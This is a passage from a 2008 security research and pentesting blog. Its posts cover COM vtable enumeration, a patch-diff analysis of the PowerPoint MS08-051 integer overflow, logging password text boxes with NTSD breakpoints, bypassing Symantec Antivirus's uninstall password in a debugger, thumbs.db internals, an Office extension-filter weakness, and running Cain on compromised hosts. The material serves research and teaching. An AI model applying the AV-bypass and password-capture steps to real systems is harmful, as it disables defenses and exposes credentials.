My favorites are <a href="http://labs.idefense.com/software/fuzzing.php#more_comraider">COMRaider</a> and Jose Roca's <a href="http://www.com.it-berater.org/typelib_browser.htm">TypeLib Browser</a>.<br /><br />Those tools are good for a first-pass analysis (like fuzzing or calling a specific method from a VBS script), but when it comes to having a look at the binary implementation itself, things become a little tougher...<br /><br />There are some IDA Pro helpers (scripts and plugins) hanging around, but given the complexity of COM and C++ reversing, it remains quite hard to tell where the code is through static analysis only.<br /><br />Then I stumbled upon <a href="http://securitylabs.websense.com/content/Blogs/3166.aspx">this post</a> (by WebSense) that gives a very easy way to locate all exported methods through the use of the <a href="http://msdn.microsoft.com/en-us/library/8etzzkb6%28VS.71%29.aspx">#import</a> directive in Visual Studio. Since they only give away screenshots, here is the full piece of code that will retrieve the RVA of the first 10 methods of the Flash plugin.<br /><br /><span style="font-size:78%;"><span style="font-family:courier new;">#include <windows.h></span><br /><span style="font-family:courier new;">#include <stdio.h></span><br /><br /><span style="font-family:courier new;">// Note: this must be a CPP file to use #import directive</span><br /><span style="font-family:courier new;">#import "C:\\WINDOWS\\SYSTEM32\\Macromed\\Flash\\Flash9e.ocx" no_namespace</span><br /><br /><span style="font-family:courier new;">int main() {</span><br /><br /><span style="font-family:courier new;"> printf("Hello, world of COM!\n");</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> CoInitialize(NULL);</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> IShockwaveFlash *pShockwave=NULL;</span><br /><span style="font-family:courier new;"> </span><br /><span 
style="font-family:courier new;"> HRESULT hr = CoCreateInstance( __uuidof(ShockwaveFlash),</span><br /><span style="font-family:courier new;"> NULL,</span><br /><span style="font-family:courier new;"> CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER,</span><br /><span style="font-family:courier new;"> __uuidof(IShockwaveFlash),</span><br /><span style="font-family:courier new;"> (void**)&pShockwave</span><br /><span style="font-family:courier new;"> );</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> if (hr==S_OK) {</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> // the first DWORD of the object is its vtable pointer</span><br /><span style="font-family:courier new;"> DWORD dwVT=*(DWORD*)pShockwave;</span><br /><span style="font-family:courier new;"> DWORD *p=(DWORD*)dwVT;</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> // walk the first 10 vtable slots; RVA = VA - module base</span><br /><span style="font-family:courier new;"> for (int i=1;i<11;i++) {</span><br /><span style="font-family:courier new;"> printf("[%d] VA=%08x RVA=%08x\n",</span><br /><span style="font-family:courier new;"> i,</span><br /><span style="font-family:courier new;"> *p,</span><br /><span style="font-family:courier new;"> *p-(DWORD)GetModuleHandle("Flash9e.ocx")</span><br /><span style="font-family:courier new;"> );</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> p++;</span><br /><span style="font-family:courier new;"> }</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> pShockwave->Release();</span><br /><span style="font-family:courier new;"> }</span><br /><br /><span style="font-family:courier new;"> CoUninitialize();</span><br /><span style="font-family:courier new;"> return 0;</span><br /><span style="font-family:courier new;">}</span><br /></span><br /><br />Sample output:<br /><br /><span style="font-size:85%;"><span style=";font-family:courier new;font-size:78%;" >C:\>cl test.cpp</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Microsoft (R) 
32-bit C/C++ Optimizing Compiler Version 14.00.50727.762 for 80x86</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >Copyright (C) Microsoft Corporation. All rights reserved.</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >test.cpp</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Microsoft (R) Incremental Linker Version 8.00.50727.762</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Copyright (C) Microsoft Corporation. All rights reserved.</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >/out:test.exe</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >test.obj</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >C:\>test.exe</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Hello, world of COM!</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[1] VA=300b4ec2 RVA=000b4ec2</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[2] VA=300b38a4 RVA=000b38a4</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[3] VA=300b38b1 RVA=000b38b1</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[4] VA=300bd353 RVA=000bd353</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[5] VA=300b78b7 RVA=000b78b7</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[6] VA=300b7d33 RVA=000b7d33</span><span style="font-size:78%;"><br /></span><span 
style=";font-family:courier new;font-size:78%;" >[7] VA=300cbe5c RVA=000cbe5c</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[8] VA=300c7c34 RVA=000c7c34</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[9] VA=300c7c46 RVA=000c7c46</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[10] VA=300c7b9d RVA=000c7b9d</span><br /></span><br />Beware: the COM component will be instantiated by this code. Do not try this on malicious code, unless you know what you are doing!<br /><br /><span style="font-weight: bold;font-size:130%;" >MS08-051 secrets</span> (2008-08-18)<br /><br />On <a href="http://www.microsoft.com/technet/security/Bulletin/ms08-Aug.mspx">August 12th</a>, Microsoft released a flurry of Office security patches.<br /><br />Among those patches is <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-051.mspx">MS08-051</a> / <a href="http://support.microsoft.com/kb/949785">Q949785</a>, a patch targeting all supported versions of PowerPoint and PowerPoint Viewer, excluding PowerPoint Viewer 2007 and PowerPoint 2008 for Mac.<br /><br />According to the bulletin, this patch fixes at least 3 vulnerabilities, 2 of them being documented on <a href="http://reversemode.com/index.php?option=com_content&task=view&id=53&Itemid=1">Reversemode.com</a>. Let's have a look at the first vulnerability, which is an integer overflow resulting in a heap overflow. At the time of writing, a vulnerable version (11.0.5703.0) of <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=428D5727-43AB-4F24-90B7-A94784AF71A4&displaylang=en">PowerPoint Viewer 2003</a> can be downloaded from the Microsoft web site. 
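<br /><br />Before the disassembly, here is an added C model (my code, not Microsoft's) that contrasts the unpatched length handling with the check the patch adds. The record layout (16-bit word at offset 0, 32-bit length at offset 2), the "len + 2" allocation size, the meaning of the remaining-bytes counter and the two sample records are inferred from the listings that follow and are assumptions, not facts from the binaries.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed record layout: a 16-bit word at offset 0 (masked with 0x3FFF
 * before MsoPopinfoGet) and a 32-bit length at offset 2, then the payload. */
#define REC_HDR 6u

enum { PARSE_OK = 0, PARSE_TRUNCATED = -1, PARSE_BAD_ALLOC = -2 };

static uint32_t rd16(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8);
}

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Assumed size handed to GlobalAlloc for a record of length len, kept in
 * 32 bits: 0xFFFFFFFF + 2 wraps to 1, matching the GlobalAlloc(0x00000001)
 * the post describes. */
uint32_t alloc_size_for(uint32_t len) {
    return len + 2u;
}

/* Pre-patch flow: trust the record length, allocate len + 2 (wrapped), then
 * copy len bytes. Returns how many bytes the copy would run past the
 * allocation (0 when the record is sane). */
uint64_t unpatched_overrun(const uint8_t *rec, size_t avail) {
    if (avail < REC_HDR)
        return 0;
    uint32_t len = rd32(rec + 2);
    uint32_t alloc = alloc_size_for(len);
    return (uint64_t)len > alloc ? (uint64_t)len - alloc : 0;
}

/* Patched flow. remaining_io models the [ebp+var_18] counter (assumed to be
 * the bytes still available in the container). The added
 * "cmp [ebp+var_18], esi / jb" refuses any record claiming more than is
 * left, so len + 2 can no longer wrap. */
int patched_parse(const uint8_t *rec, size_t avail,
                  uint32_t *remaining_io, uint32_t *popinfo_idx) {
    if (avail < REC_HDR)
        return PARSE_TRUNCATED;
    uint32_t len = rd32(rec + 2);           /* mov esi, [ebx+2]          */
    if (len == 0)
        return PARSE_OK;                    /* test esi, esi / jz        */
    if (*remaining_io < len)
        return PARSE_TRUNCATED;             /* the check MS08-051 added  */
    *remaining_io -= len;                   /* sub [ebp+var_18], esi     */
    *popinfo_idx = rd16(rec) & 0x3FFFu;     /* and eax, 3FFFh            */
    if (alloc_size_for(len) < len)
        return PARSE_BAD_ALLOC;             /* unreachable after the check */
    return PARSE_OK;
}

/* Constructed records (not taken from a real PowerPoint file). */
const uint8_t GOOD_REC[] = { 0x05, 0x40,                 /* word 0x4005 -> index 5 */
                             0x04, 0x00, 0x00, 0x00,     /* length 4               */
                             'a', 'b', 'c', 'd' };
const uint8_t EVIL_REC[] = { 0x01, 0x00,
                             0xFF, 0xFF, 0xFF, 0xFF };   /* length 0xFFFFFFFF      */

int main(void) {
    uint32_t remaining = 4, idx = 0;
    int rc;
    printf("GlobalAlloc size for len 0xFFFFFFFF: %u\n", alloc_size_for(0xFFFFFFFFu));
    printf("unpatched overrun on EVIL_REC: %llu bytes\n",
           (unsigned long long)unpatched_overrun(EVIL_REC, sizeof EVIL_REC));
    rc = patched_parse(GOOD_REC, sizeof GOOD_REC, &remaining, &idx);
    printf("patched parse of GOOD_REC: %d (popinfo index %u, %u bytes left)\n",
           rc, idx, remaining);
    remaining = 100;
    rc = patched_parse(EVIL_REC, sizeof EVIL_REC, &remaining, &idx);
    printf("patched parse of EVIL_REC: %d\n", rc);
    return 0;
}
```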
The vulnerable code path can be found in this version:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:300F642C loc_300F642C:</span><br /><span style="font-family: courier new;">.text:300F642C mov eax, [edi]</span><br /><span style="font-family: courier new;">.text:300F642E mov ecx, [ebp+var_14]</span><br /><span style="font-family: courier new;">.text:300F6431 mov ebx, [eax+ecx*4]</span><br /><span style="font-family: courier new;">.text:300F6434 mov esi, [ebx+2] <span style="font-weight: bold; color: rgb(255, 0, 0);">; EBX is user-supplied length</span></span><br /><span style="font-family: courier new;">.text:300F6437 test esi, esi</span><br /><span style="font-family: courier new;">.text:300F6439 mov [ebp+var_20], ebx</span><br /><span style="font-family: courier new;">.text:300F643C mov [ebp+var_1C], esi</span><br /><span style="font-family: courier new;">.text:300F643F jz loc_300F6516</span><br /><span style="font-family: courier new;">.text:300F6445 mov ax, [ebx]</span><br /><span style="font-family: courier new;">.text:300F6448 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:300F644D push eax</span><br /><span style="font-family: courier new;">.text:300F644E call _MsoPopinfoGet@4 ; MsoPopinfoGet(x)</span><br /></span><br />If EBX==0xFFFFFFFF, this code will result in calling GlobalAlloc(0x00000001) and copying 0xFFFFFFFF bytes later on.<br /><br />After patching PowerPoint Viewer 2003, the code looks like (thanks to <a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php">PatchDiff</a> ;):<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:300DC0BC loc_300DC0BC:</span><br /><span style="font-family: courier new;">.text:300DC0BC mov eax, [edi]</span><br /><span style="font-family: courier new;">.text:300DC0BE mov ecx, [ebp+var_14]</span><br /><span style="font-family: courier new;">.text:300DC0C1 mov ebx, [eax+ecx*4]</span><br /><span style="font-family: 
courier new;">.text:300DC0C4 mov esi, [ebx+2]</span><br /><span style="font-family: courier new;">.text:300DC0C7 test esi, esi</span><br /><span style="font-family: courier new;">.text:300DC0C9 mov [ebp+var_24], ebx</span><br /><span style="font-family: courier new;">.text:300DC0CC mov [ebp+var_20], esi</span><br /><span style="font-family: courier new;">.text:300DC0CF jz loc_300DC1B2</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:300DC0D5 cmp [ebp+var_18], esi</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:300DC0D8 jb loc_300DC1DD</span><br /><span style="font-family: courier new;">.text:300DC0DE mov ax, [ebx]</span><br /><span style="font-family: courier new;">.text:300DC0E1 sub [ebp+var_18], esi</span><br /><span style="font-family: courier new;">.text:300DC0E4 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:300DC0E9 push eax</span><br /><span style="font-family: courier new;">.text:300DC0EA call _MsoPopinfoGet@4 ; MsoPopinfoGet(x)</span></span><br /><br />End of the story? Not quite... There is at least one other Microsoft product that shares the PowerPoint codebase: <a href="http://office.microsoft.com/en-us/help/HA101733831033.aspx">Microsoft Office Live Meeting Client 2007</a>.<br /><br />Since it has PowerPoint rendering capabilities, this client is bundled with "lmpptview.dll". Beta versions of this DLL are internally numbered "12.0.x", showing a clear connection with Office 2007. As of the RTM version, this DLL is numbered "8.0.3029.0". 
However, the following code sequence can be found inside:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:004345FC loc_4345FC:</span><br /><span style="font-family: courier new;">.text:004345FC mov ecx, [ecx]</span><br /><span style="font-family: courier new;">.text:004345FE lea eax, [ecx+edx*4]</span><br /><span style="font-family: courier new;">.text:00434601 mov edi, [eax]</span><br /><span style="font-family: courier new;">.text:00434603 mov esi, [edi+2]</span><br /><span style="font-family: courier new;">.text:00434606 test esi, esi</span><br /><span style="font-family: courier new;">.text:00434608 jz short loc_434689</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:0043460A cmp [ebp-14h], esi</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:0043460D jb loc_439769</span><br /><span style="font-family: courier new;">.text:00434613 movzx eax, word ptr [edi]</span><br /><span style="font-family: courier new;">.text:00434616 sub [ebp-14h], esi</span><br /><span style="font-family: courier new;">.text:00434619 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:0043461E push eax</span><br /><span style="font-family: courier new;">.text:0043461F call mightbe_MsoPopinfoGet</span></span><br /><br />My bet is:<br /><ul><li>The Live Meeting client is not vulnerable to this flaw, because its codebase comes from PowerPoint Viewer 2007.</li><li>And PowerPoint Viewer 2007 has been patched against this flaw since the beginning, whereas PowerPoint 2007 "Gold" and SP1 have been left vulnerable.<br /></li></ul>Man, that was close...<br /><br /><span style="font-weight: bold;font-size:130%;" >Pentester trick #5: debugging without debugger</span> (2008-08-08)<br /><br />Having a debugger at hand is always useful in corner 
case pentesting (cf. <a href="http://newsoft-tech.blogspot.com/2008/08/pentester-trick-3-removing-symantec.html">bypassing Symantec password</a>). However, even if <a href="http://www.ollydbg.de/">OllyDbg</a> is a light-weight, standalone debugger, it might not always be possible to install new applications on the target system (e.g. Citrix servers, Web kiosks, mission critical servers).<br /><br />Fortunately, there is a built-in command-line debugger bundled with at least Windows 2000, XP and 2003 (this debugger has been removed from Windows Vista). And I am not talking about DEBUG.EXE ;) I am talking about NTSD.EXE, which is originally part of the <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">Debugging Tools for Windows</a>.<br /><br /><span style="font-style: italic;">Warning: NTSD has not been upgraded since Windows 2000. On Windows XP SP2, NTSD will randomly crash with a "BEX error" message (even if hardware DEP is not enabled).</span><br /><br />A useful application of debugging is logging text boxes (including <a href="http://www.nirsoft.net/utils/astlog.html">asterisk-protected boxes</a>). Let's take a running NOTEPAD.EXE process for instance. 
The following command will attach NTSD to this process:<br /><span style="font-size:85%;"><span style="font-family:courier new;">ntsd -pn notepad.exe</span></span><br /><br />The WinDbg commands would be:<br /><span style="font-size:85%;"><span style="font-family:courier new;">bp GetWindowTextA "r $t0=poi(esp+8); gu; da @$t0; g;"</span> <span style="font-family:courier new;"><br />bp GetWindowTextW "r $t1=poi(esp+8); gu; du @$t1; g;"</span> </span><br /><br />Explanation: the target functions (ANSI and Unicode versions) have the following prototype:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int GetWindowText( HWND </span><i style="font-family: courier new;">hWnd</i><span style="font-family:courier new;">, LPTSTR </span><i style="font-family: courier new;">lpString</i><span style="font-family:courier new;">, int </span><i style="font-family: courier new;">nMaxCount</i><span style="font-family:courier new;"> );</span></span><br /><br />At the function entry point, save the <span style="font-style: italic;">lpString</span> pointer (esp+8) into a temporary pseudo-register, then go up (run until the function returns), and read the output value back.<br /><br />Unfortunately, this will not work with NTSD (<span style="font-style: italic;">BEX error</span>). 
We will have to find the RET address manually (using the <span style="font-style: italic;">step over</span> or the <span style="font-style: italic;">unassemble</span> command), then set the following breakpoints:<br /><span style="font-size:85%;"><span style="font-family: courier new;">bp 7e3b218c "da poi(esp+8); g;"</span><span style="font-family: courier new;"><br />bp 7e39ce0b </span></span> <span style="font-family: courier new;font-size:85%;" >"du poi(esp+8); g;"</span><br /><br />Then if we try to replace "it" by "works" using the NOTEPAD menu:<br /><span style="font-size:85%;"><span style="font-family: courier new;">[...]</span><span style="font-family: courier new;"><br />0100a800 "it"</span><span style="font-family: courier new;"><br />0100a700 "works"</span><span style="font-family: courier new;"><br />[...]</span></span><br /><todo><br /><span style="font-style: italic;">Next post: how to log form boxes inside Internet Explorer.</span><br /></todo><br /><br /><span style="font-weight: bold;font-size:130%;" >Pentester trick #4: removing Symantec Antivirus 10.2 without knowing the password</span> (2008-08-01)<br /><br />Antivirus software is often the enemy of pentesting, because most useful tools (Cain, and even NetCat) are detected as "Potentially Unwanted Programs".<br /><br />Some antivirus products are easy to disable (like stopping a service), others are a real pain (non-stoppable drivers). Symantec Enterprise 10.2 with anti-tampering options belongs to the second category.<br /><br />Symantec Antivirus can be removed from the "Add/Remove Programs" Control Panel menu. 
However it asks for a password on removal.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecPassword.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecPassword.png" alt="" border="0" /></a><br /><br />This password is not enforced by the product's tamper-protected components, but by the uninstall logic running inside the Windows Installer process (<span style="font-family:courier new;">MsiExec.exe</span>), which is an ordinary user-mode process. Therefore it is very easy to bypass. The first step is to attach a debugger (like <a href="http://www.ollydbg.de/">OllyDbg</a>) to the <span style="font-family:courier new;">MsiExec.exe</span> process that owns the password window (this requires administrative rights or the Debug privilege).<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecMSIEXEC.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecMSIEXEC.png" alt="" border="0" /></a><br />The second step is to set a breakpoint on <span style="font-family:courier new;">GetWindowTextA</span>, which the dialog uses to read the password field. Then run the program, enter any password, and the breakpoint should be triggered. From that point, step out a few times (return to the caller) until a <span style="font-family:courier new;">TEST AL, AL</span> instruction is encountered: this is where the boolean result of the password check, returned in <span style="font-family:courier new;">AL</span>, is tested.<br /><br />Setting the <span style="font-family:courier new;">AL</span> register to any non-zero value at that point makes the check pass and allows the product to be uninstalled.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecTest.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecTest.png" alt="" border="0" /></a><br />Note: the ECX and EDX registers point to the (entered and expected) password hashes. 
But that is another story :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-14655622550602947512008-04-06T15:58:00.003+01:002008-04-06T17:55:08.872+01:00The case of "thumbs.db" fileMy Windows skills were recently challenged by a <a href="http://sid.rstack.org/blog/tb.php?id=257&chk=jyu3oq">blog post</a> of <a href="http://sid.rstack.org/">Cédric Blancher</a> about the "thumbs.db" file internals.<br /><br />It is widely documented that this file is an OLE (structured storage) container holding thumbnail images, created by Explorer when the corresponding <a href="http://www.tunexp.com/tips/work_with_multimedia/disable_the_thumbnail_cache/">option</a> is checked (which is the default configuration). Some Open Source <a href="http://vinetto.sourceforge.net/">tools</a> even exist to parse the "thumbs.db" file.<br /><br />However, one question has been left unanswered: "how is custom image ordering preserved?".<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Naive approach</span></span><br /><br />A quick test yields the following empirical result:<br /><ul><li>Within Explorer, browse a folder that has a sub-folder where some images are stored. A "thumbs.db" file is created in this sub-folder, if necessary.</li><li>Enter the sub-folder and move images around. The "thumbs.db" file size increases.</li><li>Back up the existing "thumbs.db" file with the following commands (it is a read-only, system, hidden file, hence the attribute reset):</li></ul><span style="font-size:85%;"><span style="font-family:courier new;">attrib -r -s -h thumbs.db</span><br /><span style="font-family:courier new;">copy thumbs.db backup.db</span></span><br /><ul><li>Shuffle images again. 
Compare the new "thumbs.db" file with the backup, using the following commands:</li></ul><span style="font-size:85%;"><span style="font-family:courier new;">attrib -r -s -h thumbs.db</span><br /><span style="font-family:courier new;">fc /b backup.db thumbs.db</span></span><br /><br />The files turn out to be exactly the same: the custom ordering is not stored in "thumbs.db"!<br /><br /><span style="font-weight: bold;font-size:130%;" >First trail</span><br /><br />In a sense, this is perfectly logical in the Windows world, since <span style="font-style: italic;">image ordering is a per-user setting</span>. Two users sharing the same computer could order images differently without affecting each other's view. It would make no sense to store this information in a single, shared file.<br /><br />Per-user settings could be stored in a configuration file (e.g. an ".ini" file) inside the <span style="font-size:85%;"><span style="font-family:courier new;">%UserProfile%</span></span> directory, but this is very "Windows 3.1" style.<br /><br />At this point, we rather suspect that the settings are stored under the HKCU registry hive.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Chasing the culprit</span></span><br /><br />Running <a href="http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx">Process Monitor</a> against the Explorer process could quickly become exhausting, given the number of registry keys that are accessed during normal system operation. 
We will rather try to pinpoint the system component that manages the "thumbs.db" file.<br /><br />A fast and efficient approach is to search for string references in the system directories:<br /><br /><span style="font-family: courier new;font-size:85%;" >C:\WINDOWS\SYSTEM32>strings *.dll | findstr /i thumbs.db<br /><br />C:\WINDOWS\SYSTEM32\mydocs.dll: thumbs.db<br />C:\WINDOWS\SYSTEM32\shell32.dll: Thumbs.db<br />C:\WINDOWS\SYSTEM32\shell32.dll: thumbs.db<br />C:\WINDOWS\SYSTEM32\wmp.dll: thumbs.db</span><br /><br />Here we use <a href="http://technet.microsoft.com/en-us/sysinternals/bb897439.aspx">strings.exe</a> from SysInternals, which has the big advantage over the various "grep" ports of handling both ANSI and Unicode (UTF-16) strings at once.<br /><br />A quick look inside <span style="font-family: courier new;font-size:85%;" >mydocs.dll</span> shows a string reference from the <span style="font-size:85%;"><span style="font-family:courier new;">CleanupSystemFolder()</span></span> function, which does not seem to be related to our matter. The Windows Media Player library (<span style="font-family: courier new;font-size:85%;" >wmp.dll</span>) does not seem to be a valid candidate either. Therefore, the core processing should be done in <span style="font-size:85%;"><span style="font-family:courier new;">shell32.dll</span></span>.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Shell32 internals</span></span><br /><br />Shell32 is a rather old and complex system component - a complete analysis is out of the question.<br /><br />However a quick look inside this component yields interesting information:<br /><ul><li>It makes heavy use of the <a href="http://en.wikipedia.org/wiki/Component_Object_Model">COM model</a>.</li><li>It holds many interestingly named C++ classes, like CThumbnailMenu, CThumbStore and CEnumThumbStore.</li><li>Thumbnail processing is done in the background by a worker thread. 
Therefore changes are not immediately reflected, which hampers the Process Monitor approach.<br /></li></ul>The key point is that the CThumbStore class seems to implement the <a href="http://msdn2.microsoft.com/en-us/library/ms687223%28VS.85%29.aspx">IPersistFile</a>, <a href="http://msdn2.microsoft.com/en-us/library/bb775348%28VS.85%29.aspx">IPersistFolder</a>, <a href="http://msdn2.microsoft.com/en-us/library/ms679731%28VS.85%29.aspx">IPersistStorage</a> and <a href="http://msdn2.microsoft.com/en-us/library/bb761154%28VS.85%29.aspx">IShellImageStore</a> interfaces, among others.<br /><br />This should ring a bell about <a href="http://msdn2.microsoft.com/en-us/library/aa768185%28VS.85%29.aspx">property bags</a>, which are the standard way for a COM object to store opaque, persistent data. Therefore we will make a great leap forward, and search directly for the "bags" keyword inside the binary file.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Beginning to see the light</span></span><br /><br />The search for "bags" is successful: there are very few references, with very interesting content.<br /><br />The first reference comes from this registry key:<br /><span style="font-family: courier new;font-size:85%;" >HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags</span><br /><br />It is referenced from:<br /><span style="font-size:85%;">CDefView::_SaveGlobalViewState()<br />CDefView::_ResetGlobalViewState()</span><br /><br />The second reference comes from this registry sub-key:<br /><span style="font-size:85%;"><span style="font-family:courier new;">DUIBags\ShellFolders\{00000000-0000-0000-0000-000000000000}</span></span><br /><br />It is referenced from:<br /><span style="font-size:85%;"><span style="font-family:courier new;">CDUIView::_InitializeShellFolderPropertyBag()</span></span><br /><br />Under the "ShellNoRoam\Bags" registry key, we find thousands of numeric subkeys (one per remembered folder view), which in turn hold values of interest, like the coordinates of each 
image. After digging a little more, we gather the following information:<br /><ul><li>Monitoring the "ShellNoRoam" key with Process Monitor reveals that the registry information is updated only when leaving the folder.</li><li>Custom image ordering is applied on folder re-opening only if "Remember each folder's view settings" is checked in the Explorer configuration. Otherwise the default layout is used.<br /></li><li>There is a <a href="http://support.microsoft.com/kb/813711">bug</a> in Windows XP pre-SP2 that prevents remembering more than 200 custom views :)<br /></li></ul>At this point, there are still open questions, like "how does the <span style="font-size:85%;"><span style="font-family: courier new;">ItemPos</span></span> binary blob relate to the effective image position?". This would require an in-depth analysis of <span style="font-size:85%;"><span style="font-family: courier new;">CViewState::LoadPositionBlob()</span></span>, maybe.<br /><br />But most of the question is answered for now!<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Conclusion</span></span><br /><br />With a minimal amount of code analysis, we were able to pinpoint the code that manages the "thumbs.db" file, and to find out how persistent image location data is actually managed by the Explorer process (in the per-user registry, not in "thumbs.db").<br /><br /><span style="font-style: italic;">Final note: this article relates to Windows XP SP2 only. Windows Vista might exhibit different behaviour.</span>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-80723345322016579262008-04-04T22:02:00.005+01:002008-04-04T22:39:03.915+01:00The truth about Access 0-daysSecurity flaws in popular Office file formats (namely DOC, XLS and PPT) have been very common in the past few years, accounting for a large number of Microsoft Security Bulletins (cf. 
slide #4 on <a href="http://download.microsoft.com/download/9/5/1/951c5d52-020b-4cda-b000-411864b3e4f2/Jour1-243-1-Fuzzing_des_documents_Office.pptx">this presentation</a>). They have also been involved in high-profile targeted attacks.<br /><br />However, flaws in less used Office file formats (namely PUB and MDB) have been largely disregarded by Microsoft, for at least two reasons:<br /><ul><li>The Access (.MDB) and Publisher (.PUB) applications are not part of the Office Standard suite - they are available in higher-grade SKUs only.</li><li>The Access file format is considered "insecure by design", since automatic code execution on file opening cannot be blocked. Therefore MDB files are included in Microsoft's <a href="http://support.microsoft.com/kb/883260">blocked</a> <a href="http://support.microsoft.com/kb/925330">list</a>. This list is enforced by the Outlook application on attachments, among others.</li></ul>A large number of "buffer overflow"-like bugs involving MDB files have been floating around since <a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2005-0944">year 2005</a> at least.<br /><br />Some malware authors recently found a way to bypass Microsoft's filters by sending two attachments in the same email (or the same ZIP file): the first one is in an approved Office file format (let's say DOC), the other has an unknown extension.<br /><br />When the Word document opens the second one as an ODBC data source through the Jet engine (where the flaw lies), the extension is simply ignored.<br /><br /><a href="http://www.avertlabs.com/research/blog/index.php/2008/03/21/microsoft-jet-database-engine-attacked-through-word/trackback/">McAfee Avert Labs</a> blogged about that, but they missed something that is regularly re-discovered: OLE documents are opened by the right Office application regardless of their extension, because the shell looks at the CLSID stored inside the compound file (cf. GetClassFile()) rather than at the file name.<br /><br />How to reproduce:<br /><ol><li>Create a new Word document named "test.doc".</li><li>Rename "test.doc" into "test.xxx" (the extension must not be 
already registered).</li><li>Double-click on "test.xxx". Enjoy!</li></ol>Therefore, if you want to be protected against Office-based attacks, you should block any unknown extension at your mail gateway (or rather, use a white-list of "known safe" extensions, and check attachment content rather than trusting names).newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-85485030402363369032008-03-03T12:00:00.002+01:002008-03-03T16:54:50.224+01:00Pentester trick #3: using Cain without installing it<a href="http://www.oxid.it/">Cain</a> is one of the most useful pentesting tools for Windows. It has been rated #9 in the <a href="http://sectools.org/">Top 100</a> of security tools.<br /><br />While Cain is powerful when used on the pentester's computer, it is quite limited in terms of "pivoting" (i.e. using a compromised host as a stepping stone to reach another part of the target network).<br /><br />Installing Cain on a compromised host has at least two severe limitations:<br /><ol><li>Cain requires <a href="http://www.winpcap.org/">Winpcap</a>. If Winpcap is not found, Cain will refuse to load. Winpcap installs a new driver, and might require a reboot, which is not good in terms of footprint.<br /></li><li>Cain is detected as <span style="font-style: italic;">Potentially Unwanted Software</span> by most antivirus software out there.</li></ol>Fortunately, both limitations can be worked around.<br /><br />To have Cain loading properly, it is enough to copy the following DLLs into the Cain directory:<br 